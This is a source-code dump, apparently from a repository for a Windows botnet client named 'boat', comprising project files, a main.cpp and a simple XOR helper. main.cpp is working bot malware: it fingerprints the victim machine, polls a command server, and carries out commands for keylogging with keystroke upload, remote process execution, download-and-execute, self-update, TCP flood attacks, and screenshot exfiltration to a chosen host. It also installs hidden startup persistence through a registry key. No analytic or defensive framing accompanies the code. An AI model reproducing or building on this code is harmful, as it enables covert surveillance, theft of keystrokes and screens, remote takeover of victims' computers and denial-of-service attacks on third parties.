{de9ac1e3-567b-43eb-b57f-2885528ba6ad} 36 | 37 | 38 | {4e83736e-7066-43b0-8173-40e0cb8236d4} 39 | 40 | 41 | {9bd36b52-7cf8-40ed-bc06-a6c9cb20b63c} 42 | 43 | 44 | {f57dc79f-7b66-4da9-b5ba-696653afeefe} 45 | 46 | 47 | {7de75176-7a58-4ef2-92a3-5d146be7a9c8} 48 | 49 | 50 | {114635cd-f68d-4faa-912b-5691924421c0} 51 | 52 | 53 | {688c5435-0fa1-43bb-a668-38bc8193a833} 54 | 55 | 56 | {40b9e90e-2310-402f-977e-7fd9314df036} 57 | 58 | 59 | 60 | 61 | Source Files\HTTP 62 | 63 | 64 | Source Files 65 | 66 | 67 | Source Files\Sockets 68 | 69 | 70 | Source Files\Sockets 71 | 72 | 73 | Source Files\CString 74 | 75 | 76 | Source Files\Encryption 77 | 78 | 79 | Source Files\Encoding 80 | 81 | 82 | Source Files\Helpers 83 | 84 | 85 | Source Files\Config 86 | 87 | 88 | Source Files\Helpers 89 | 90 | 91 | Source Files\Helpers 92 | 93 | 94 | Source Files\Helpers 95 | 96 | 97 | Source Files\Helpers 98 | 99 | 100 | Source Files\Helpers 101 | 102 | 103 | Source Files\Helpers 104 | 105 | 106 | Source Files\Helpers 107 | 108 | 109 | Source Files\Helpers 110 | 111 | 112 | Source Files\Helpers 113 | 114 | 115 | Source Files\Helpers 116 | 117 | 118 | Source Files\Helpers 119 | 120 | 121 | Source Files\Helpers 122 | 123 | 124 | Source Files\Helpers 125 | 126 | 127 | Source Files\Helpers 128 | 129 | 130 | Source Files\Helpers 131 | 132 | 133 | 134 | 135 | Header Files\HTTP 136 | 137 | 138 | Header Files\Sockets 139 | 140 | 141 | Header Files\Sockets 142 | 143 | 144 | Header Files\Config 145 | 146 | 147 | Header Files\CString 148 | 149 | 150 | Header Files\Encryption 151 | 152 | 153 | Header Files\Encoding 154 | 155 | 156 | Header Files\Helpers 157 | 158 | 159 | Header Files\Config 160 | 161 | 162 | Header Files\Helpers 163 | 164 | 165 | Header Files\Helpers 166 | 167 | 168 | Header Files\Helpers 169 | 170 | 171 | Header Files\Helpers 172 | 173 | 174 | Header Files\Helpers 175 | 176 | 177 | Header Files\Helpers 178 | 179 | 180 | Header Files\Helpers 181 | 182 | 183 | Header Files\Helpers 184 | 185 | 186 | Header Files\Helpers 187 | 188 | 189 | Header Files\Helpers 190 | 191 | 192 | Header Files\Helpers 193 | 194 | 195 | Header Files\Helpers 196 | 197 | 198 | Header Files\Helpers 199 | 200 | 201 | Header Files\Helpers 202 | 203 | 204 | Header Files\Helpers 205 | 206 | 207 | Header Files\Helpers 208 | 209 | 210 | -------------------------------------------------------------------------------- /boat/boat.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | WindowsLocalDebugger 5 | 6 | -------------------------------------------------------------------------------- /boat/main.cpp: -------------------------------------------------------------------------------- 1 | #include "HttpQuery.h" 2 | #include "AggressiveOptimize.h" 3 | #include "Gate.h" 4 | #include "SocketInit.h" 5 | #include "WebSafeEncryption.h" 6 | #include "StringOperations.h" 7 | #include 8 | #include "URLEncoding.h" 9 | #include 10 | #include "Commands.h" 11 | #include "WebsiteChecker.h" 12 | //#include 13 | #include "OSVersionChecker.h" 14 | #include "OSHwidChecker.h" 15 | #include "OSCpuChecker.h" 16 | #include "OSGpuChecker.h" 17 | #include "OSNetVersionChecker.h" 18 | #include "PEIsAdmin.h" 19 | #include "OSGetRam.h" 20 | #include "GateHelper.h" 21 | #include "Keylogger.h" 22 | #include "Flood.h" 23 | #include "Processes.h" 24 | #include "DownloadExecute.h" 25 | #include "Screenshot.h" 26 | #include "Startup.h" 27 | #include 28 | #include // sleep function extra 29 | 30 | bool continuePolling = true; 31 | 32 | static CommandParserDelegate Parsers[500]; 33 | static PostPollDelegate Events[500]; 34 | int event_count = 0; 35 | //got really lazy with this, really need to start moving shit to different files 36 | //we will do it last I guess ye 37 | 38 | void RunEvents() { 39 | for (int i = 0; i < event_count; i++) { 40 | Events[i](); 41 | } 42 | } 43 | 44 | int GetEventIndex(PostPollDelegate proc) { 45 | for (int i = 0; i < event_count; i++) 46 | if (Events[i] == proc) return i; 47 | 48 | return -1; 49 | } 50 | 51 | bool AddEvent(PostPollDelegate proc) { 52 | int existing = GetEventIndex(proc); 53 | if (existing != -1) return true; 54 | 55 | if (event_count == 500) return false; 56 | Events[event_count] = proc; 57 | event_count++; 58 | return true; 59 | } 60 | 61 | bool RemoveEvent(PostPollDelegate proc) { 62 | int existing = GetEventIndex(proc); 63 | if (existing == -1) return true; 64 | 65 | for (int i = existing + 1; i < event_count; i++) { 66 | Events[existing++] = Events[i]; 67 | } 68 | 69 | event_count--; 70 | return true; 71 | } 72 | 73 | void KeylogFlushEvent() { 74 | int length; 75 | char* result = FlushKeylogBuffer(&length); 76 | if (length != 0) { 77 | char* command = CreateCommand(-1, COMMAND_KEYLOG, result, length); 78 | 79 | char* response = SendCommandWithDecodedResponse(command); 80 | FreeDecodedResponse(response); 81 | } 82 | 83 | FreeFlushKeylogBufferResult(result); 84 | } 85 | 86 | void KeylogParser(int commandId, int commandType, char* data) 87 | { 88 | char* responsedata; 89 | if (strcmp(data, "start") == 0) { 90 | bool res = StartLogger(); 91 | responsedata = res ? "true" : "false"; 92 | if (res) AddEvent(KeylogFlushEvent); 93 | } 94 | else if (strcmp(data, "stop") == 0) { 95 | bool res = StopLogger(); 96 | responsedata = res ? "true" : "false"; 97 | if (res) RemoveEvent(KeylogFlushEvent); 98 | } 99 | else { 100 | responsedata = "error"; 101 | } 102 | 103 | char* command = CreateCommand(commandId, commandType, responsedata, strlen(responsedata)); 104 | 105 | char* response = SendCommandWithDecodedResponse(command); 106 | FreeDecodedResponse(response); 107 | FreeCommand(command); 108 | } 109 | 110 | void RemoteProcessParser(int commandId, int commandType, char* data) 111 | { 112 | int len; 113 | char** splitResults = SplitString(data, "@", &len, false); 114 | 115 | char* command; 116 | 117 | if (len == 2) { 118 | int length; 119 | char* result = GetProcessResult(splitResults[0], strlen(splitResults[1]) ? splitResults[1] : NULL, &length); 120 | command = CreateCommand(commandId, commandType, result, length); 121 | FreeProcessResult(result); 122 | } 123 | else { 124 | command = CreateCommand(commandId, commandType, "Invalid arguments", 17); 125 | } 126 | 127 | FreeSplitStringBuffer(splitResults, len); 128 | 129 | char* response = SendCommandWithDecodedResponse(command); 130 | FreeDecodedResponse(response); 131 | 132 | FreeCommand(command); 133 | } 134 | 135 | DWORD __stdcall TCPFloodThreadStart(PVOID data) { 136 | char** splitResults = (char**)data; 137 | int length = std::stoi(splitResults[2], 0, 10); 138 | int timespersecond = std::stoi(splitResults[3], 0, 10); 139 | 140 | unsigned short port = (unsigned short)strtoul(splitResults[1], NULL, 0); 141 | 142 | TCPFlood(splitResults[0], port, length, timespersecond); 143 | 144 | FreeSplitStringBuffer(splitResults, 4); 145 | 146 | return 0; 147 | } 148 | 149 | void TCPFloodParser(int commandId, int commandType, char* data) { 150 | int len; 151 | char** splitResults = SplitString(data, "@", &len, false); 152 | char* results; 153 | 154 | if (len != 4) { 155 | FreeSplitStringBuffer(splitResults, len); 156 | results = "Invalid argument"; 157 | } 158 | else { 159 | results = "Started"; 160 | CreateThread(NULL, NULL, TCPFloodThreadStart, splitResults, NULL, NULL); 161 | } 162 | 163 | char* command = CreateCommand(commandId, commandType, results, strlen(results)); 164 | char* response = SendCommandWithDecodedResponse(command); 165 | FreeDecodedResponse(response); 166 | 167 | FreeCommand(command); 168 | } 169 | 170 | void RemoteProcessNoResultParser(int commandId, int commandType, char* data) 171 | { 172 | int len; 173 | char** splitResults = SplitString(data, "@", &len, false); 174 | 175 | char* command; 176 | 177 | if (len == 2) { 178 | char* result = StartProcess(splitResults[0], strlen(splitResults[1]) ? splitResults[1] : NULL) ? "true" : "false"; 179 | command = CreateCommand(commandId, commandType, result, strlen(result)); 180 | } 181 | else if(len == 1) { 182 | char* result = StartProcess(splitResults[0], "") ? "true" : "false"; 183 | command = CreateCommand(commandId, commandType, result, strlen(result)); 184 | } 185 | else { 186 | command = CreateCommand(commandId, commandType, "Invalid arguments", 17); 187 | } 188 | 189 | FreeSplitStringBuffer(splitResults, len); 190 | 191 | char* response = SendCommandWithDecodedResponse(command); 192 | FreeDecodedResponse(response); 193 | 194 | FreeCommand(command); 195 | } 196 | 197 | void JoinParser(int commandId, int commandType, char* data) 198 | { 199 | SetBotId(data); 200 | printf("Bot ID: %s", data); 201 | } 202 | 203 | void PollParser(int commandId, int commandType, char* data) 204 | { 205 | int numResults; 206 | char** splitResults = SplitString(data, "\n", &numResults); 207 | 208 | for (int i = 0; i < numResults; i++) 209 | { 210 | char* newCommandData; 211 | int newCommandType; 212 | int newCommandId = ParseCommand(splitResults[i], &newCommandData, &newCommandType); 213 | 214 | if (newCommandType < 0) 215 | continuePolling = false; 216 | else if (newCommandType != COMMAND_POLL && newCommandType < 500 && Parsers[newCommandType] != NULL) 217 | Parsers[newCommandType](newCommandId, newCommandType, newCommandData); 218 | 219 | FreeParsedCommandResult(newCommandData); 220 | } 221 | 222 | FreeSplitStringBuffer(splitResults, numResults); 223 | } 224 | 225 | void SiteCheckerParser(int commandId, int commandType, char* data) 226 | { 227 | bool isSiteUp = CheckIfWebsiteIsUp(data); 228 | 229 | char* command = CreateCommand(commandId, commandType, isSiteUp ? "Up" : "Down", isSiteUp ? 2 : 4); 230 | 231 | char* response = SendCommandWithDecodedResponse(command); 232 | FreeDecodedResponse(response); 233 | } 234 | void DownloadAndUpdate(int commandId, int commandType, char* data) 235 | { 236 | bool isRunning = DownloadExecuteFile(data); 237 | 238 | char* command = CreateCommand(commandId, commandType, isRunning ? "True" : "False", isRunning ? 4 : 5); 239 | 240 | char* response = SendCommandWithDecodedResponse(command); 241 | FreeDecodedResponse(response); 242 | if(isRunning) 243 | ExitProcess(0x0); 244 | } 245 | void DownloadExecuteParser(int commandId, int commandType, char* data) 246 | { 247 | bool isRunning = DownloadExecuteFile(data); 248 | 249 | char* command = CreateCommand(commandId, commandType, isRunning ? "True" : "False", isRunning ? 4 : 5); 250 | 251 | char* response = SendCommandWithDecodedResponse(command); 252 | FreeDecodedResponse(response); 253 | } 254 | 255 | void MessageBoxParser(int commandId, int commandType, char* data) 256 | { 257 | int numResults; 258 | char** splitResults = SplitString(data, "@", &numResults); 259 | 260 | if (numResults > 0) 261 | { 262 | MessageBoxA(0, splitResults[0], numResults > 1 ? splitResults[1] : "", 0); 263 | } 264 | 265 | FreeSplitStringBuffer(splitResults, numResults); 266 | 267 | char* command = CreateCommand(commandId, commandType, "Complete", 8); 268 | 269 | char* response = SendCommandWithDecodedResponse(command); 270 | FreeDecodedResponse(response); 271 | } 272 | 273 | void ScreenshotParser(int commandId, int commandType, char* data) 274 | { 275 | int len; 276 | char** splitResults = SplitString(data, "@", &len, false); 277 | unsigned short port = (unsigned short)strtoul(splitResults[1], NULL, 0); 278 | 279 | int length; 280 | char* scr = CaptureScreenshot(&length); 281 | 282 | bool result = SendScreenshot(splitResults[0], port, scr, length, GetBotId()); 283 | FreeSplitStringBuffer(splitResults, len); 284 | 285 | char* command = CreateCommand(commandId, commandType, result ? "Success" : "Fail", result ? 7 : 4); 286 | FreeScreenshot(scr); 287 | char* response = SendCommandWithDecodedResponse(command); 288 | FreeDecodedResponse(response); 289 | } 290 | 291 | void InitializeParsers() 292 | { 293 | ZeroMemory(Parsers, sizeof(CommandParserDelegate) * 500); 294 | Parsers[COMMAND_JOIN] = JoinParser; 295 | Parsers[COMMAND_POLL] = PollParser; 296 | Parsers[COMMAND_CHECKIFSITEISUP] = SiteCheckerParser; 297 | Parsers[COMMAND_MESSAGEBOX] = MessageBoxParser; 298 | Parsers[COMMAND_KEYLOG] = KeylogParser; 299 | Parsers[COMMAND_REMOTEPROCESS] = RemoteProcessParser; 300 | Parsers[COMMAND_DOWNLOADEXECUTE] = DownloadExecuteParser; 301 | Parsers[COMMAND_REMOTEPROCESSNORESULT] = RemoteProcessNoResultParser; 302 | Parsers[COMMAND_TCPFLOOD] = TCPFloodParser; 303 | Parsers[COMMAND_UPDATE] = DownloadAndUpdate; 304 | Parsers[COMMAND_SCREENSHOT] = ScreenshotParser; 305 | } 306 | 307 | //TODO: move command generation functions to another file 308 | char* GetInitialJoinCommand() 309 | { 310 | //i did these shit 311 | char* hwid = (char*)malloc(100); 312 | getHwid(hwid, 100); 313 | 314 | char* os = (char*)malloc(100); 315 | windowsVersionName(os, 99); 316 | 317 | char* cpu = (char*)malloc(100); 318 | getCpuName(cpu, 99); 319 | 320 | char* gpu = (char*)malloc(200); 321 | getGpuName(gpu, 199); 322 | 323 | char* netVersion = (char*)malloc(50); 324 | getLastestNETinstalled(netVersion, 49); 325 | 326 | char* admin = (char*)malloc(6); 327 | admin[5] = '\0'; 328 | check(admin, 5); 329 | 330 | char* ram = (char*)malloc(20); 331 | getram(ram, 19); 332 | 333 | int elementSize = 13; 334 | char** formattedString = new char*[elementSize] { hwid, "@", os, "@", cpu, "@", gpu, "@", netVersion, "@", admin, "@", ram }; 335 | 336 | int finalLength; 337 | char* finalBuffer = JoinString(formattedString, elementSize, &finalLength); 338 | 339 | free(os); 340 | 341 | char* command = CreateCommand(-1, COMMAND_JOIN, finalBuffer, finalLength); 342 | 343 | FreeJoinStringBuffer(finalBuffer); 344 | 345 | return command; 346 | } 347 | 348 | void InitializePollThread() 349 | { 350 | char* join = GetInitialJoinCommand(); 351 | 352 | char* response = SendCommandWithDecodedResponse(join); 353 | 354 | FreeCommand(join); 355 | 356 | char* commandData; 357 | int commandType; 358 | int commandId = ParseCommand(response, &commandData, &commandType); 359 | 360 | if (commandType < 0) 361 | continuePolling = false; 362 | else if (commandType < 500 && Parsers[commandType] != NULL) 363 | Parsers[commandType](commandId, commandType, commandData); 364 | 365 | FreeParsedCommandResult(commandData); 366 | 367 | FreeDecodedResponse(response); 368 | 369 | char* poll = CreateCommand(-1, COMMAND_POLL, "", 0); 370 | 371 | while (continuePolling) 372 | { 373 | RunEvents(); 374 | 375 | response = SendCommandWithDecodedResponse(poll); 376 | 377 | commandId = ParseCommand(response, &commandData, &commandType); 378 | 379 | if (commandType < 0) 380 | continuePolling = false; //if its less than zero, quit app to prevent excepttion. 381 | else if (commandType < 500 && Parsers[commandType] != NULL) 382 | Parsers[commandType](commandId, commandType, commandData); 383 | 384 | FreeParsedCommandResult(commandData); 385 | 386 | FreeDecodedResponse(response); 387 | 388 | Sleep(POLL_RATE); 389 | } 390 | 391 | 392 | } 393 | 394 | int WINAPI WinMain(HINSTANCE inst, HINSTANCE prev, LPSTR cmd, int show) 395 | 396 | { 397 | 398 | HANDLE hThread = NULL; 399 | DWORD dwThreadId = NULL; 400 | 401 | // Allocate structure 402 | PINSTALLATION_INFO ptrInstallInfo = (PINSTALLATION_INFO)malloc(sizeof(INSTALLATION_INFO)); 403 | RtlSecureZeroMemory(ptrInstallInfo, sizeof(INSTALLATION_INFO)); 404 | 405 | // Populate structure with values 406 | ptrInstallInfo->wStrFileName = L"FileName.exe"; 407 | ptrInstallInfo->wStrFolderName = L"FolderName"; 408 | ptrInstallInfo->wStrRegKeyName = L"RegKey"; 409 | ptrInstallInfo->dwInstallationAttributes = FILE_ATTRIBUTE_HIDDEN; 410 | 411 | // Create new thread 412 | hThread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)RunStartupRoutine, (LPVOID)ptrInstallInfo, NULL, &dwThreadId); 413 | //WaitForSingleObject(hThread, INFINITE); 414 | 415 | if(!SocketStartup()) return 0; 416 | 417 | InitializeParsers(); 418 | InitializePollThread(); 419 | 420 | SocketCleanup(); 421 | return 0; 422 | } 423 | -------------------------------------------------------------------------------- /boat/xor.cpp: -------------------------------------------------------------------------------- 1 | #include "xor.h" 2 | #include 3 | 4 | char* XORInputKey(char* input, char* key, int inputLength, int keyLength) 5 | { 6 | char* output = (char*)malloc(inputLength + 1); 7 | output[inputLength] = 0; 8 | for (int i = 0; i < inputLength; i++) 9 | output[i] = input[i] ^ key[i % keyLength]; 10 | return output; 11 | } 12 | 13 | void FreeXORResult(char* input) 14 | { 15 | free(input); 16 | } 17 | 18 | char* GenerateKey(int length) 19 | { 20 | char* buffer = (char*)malloc(length); 21 | for (int i = 0; i < length; i++) 22 | buffer[i] = rand() * 255; 23 | return buffer; 24 | } 25 | 26 | void FreeKey(char* key) 27 | { 28 | free(key); 29 | } -------------------------------------------------------------------------------- /boat/xor.h: -------------------------------------------------------------------------------- 1 | #ifndef XOR_H 2 | #define XOR_H 3 | 4 | char* XORInputKey(char* input, char* key, int inputLength, int keyLength); 5 | void FreeXORResult(char* input); 6 | char* GenerateKey(int length); 7 | void FreeKey(char* key); 8 | 9 | #endif --------------------------------------------------------------------------------